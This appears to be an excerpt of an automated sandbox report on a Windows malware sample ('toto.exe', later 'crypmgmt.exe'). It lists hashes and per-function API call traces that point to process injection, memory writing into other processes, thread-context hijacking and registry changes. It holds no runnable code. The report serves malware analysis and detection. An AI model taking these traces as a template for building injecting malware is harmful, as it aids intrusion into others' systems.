  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 63005

General

Root Process Name:d3d8sext.exe
Process MD5:2977C206A36F6D0CEC371F9F767DE1D3
Total matches:148
Initial Analysis Report:Open
Initial sample Analysis ID:63005
Initial sample SHA 256:663E6F25B541228C0555C984846E342BF801CAD542414DDD222BB947DEA49D56
Initial sample name:toto.exe

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32E04, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 251 Total matches: 146registrystringmemory
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
